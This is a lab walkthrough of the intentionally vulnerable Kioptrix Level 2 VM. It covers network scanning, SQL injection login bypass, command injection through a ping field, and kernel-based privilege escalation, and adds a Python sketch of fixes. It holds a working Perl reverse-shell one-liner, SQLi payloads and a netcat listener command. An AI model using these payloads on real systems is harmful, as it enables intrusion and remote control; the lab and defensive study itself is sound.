Vulnhub – Kioptrix Level 1.1 (#2) Walkthrough

So, I’m here with my second write-up, this time for the Vulnhub Kioptrix Level 2 challenge. We usually start by enumerating services, but before that we have to find out the IP address of the target machine.

Information Gathering

netdiscover will scan for all devices connected to your network; alternatively you can use arp-scan, your choice.


arp-scan --interface=eth0 --localnet

Now that we have the target IP address, let’s take a look at which services are running on that server.


nmap -oA nmap -sC -sV

These are the services running on the target machine.

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql

Port 80 is running Apache httpd 2.0.52 (CentOS).

Let’s take a look,

A Remote System Administration Login page with username and password fields. Let’s take a look at the page source; we might find something interesting.

Remote System Administration Login

Nothing special there, but since there are no input checks on the username and password fields, we can try SQLi.


Below is the request we send, followed by the response we got.


POST /index.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

uname=1' or '1' = '11&psw=1' or '1' = '1&btnLogin=Login


Welcome to the Basic Administrative Web Console
Ping a Machine on the Network:

So it was a simple SQL injection (1' or '1' = '1).

We have tested SQL injection manually; let’s try sqlmap now.


sqlmap generated the payload for us!

Payload: uname=-2356' OR 1260=1260-- DpYb&psw=admin&btnLogin=Login

Reverse Shell

There’s another field that runs a ping command. Testing it for injection again, I found that a simple ‘;’ (semicolon) is enough to chain a second shell command onto the ping.

So this is what I did ($i is the address of the listening machine):

; perl -e 'use Socket;$i="";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

And I ran "nc -lvp 1337" on my machine to catch the reverse shell.
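Both injection points above (the login form’s 1' or '1' = '1 and the semicolon in the ping field) modelled in Python with a hardened version of each, as an added example that is not part of the original walkthrough or the VM’s own PHP code; the users table, its row and the ping -c 1 form of the command are assumptions.

```python
# Added example, not the Kioptrix console's code. Models the two injection
# points from the walkthrough and the fix for each. SQLite stands in for the
# target's MySQL; the table and its row are constructed.
import ipaddress
import sqlite3


def _db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")  # constructed
    return conn


def login_vulnerable(uname, psw):
    """Query built by string concatenation, as the console does: the quote in
    1' or '1' = '1 closes the literal and the OR turns the WHERE clause into a
    tautology, so the first row matches whatever the password is."""
    sql = (f"SELECT username FROM users WHERE username = '{uname}' "
           f"AND password = '{psw}'")
    return _db().execute(sql).fetchone() is not None


def login_safe(uname, psw):
    """Parameterised query: the quotes in the input stay data, not SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return _db().execute(sql, (uname, psw)).fetchone() is not None


def ping_command_vulnerable(host):
    """Shell string built from user input (assumed ping -c 1 form): a ';' ends
    the ping command and the shell runs whatever follows as a second command."""
    return f"ping -c 1 {host}"  # would be handed to /bin/sh by the console


def ping_command_safe(host):
    """Accept only a syntactically valid IP address and return an argv list to
    run without a shell, so no separator is ever interpreted."""
    addr = ipaddress.ip_address(host.strip())  # ValueError on '10.0.0.5; id'
    return ["ping", "-c", "1", str(addr)]
```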

Now we’re going after root access.


Running the enumeration script didn’t turn up anything interesting, but if you take a look at the kernel version, there are exploits available for it.

[-] Kernel information (continued): Linux version 2.6.9-55.EL ( (gcc version 3.4.6 20060404 (Red Hat 3.4.6 -8))

After some Google searches I found that this exploit might work, so I gave it a try and it actually worked.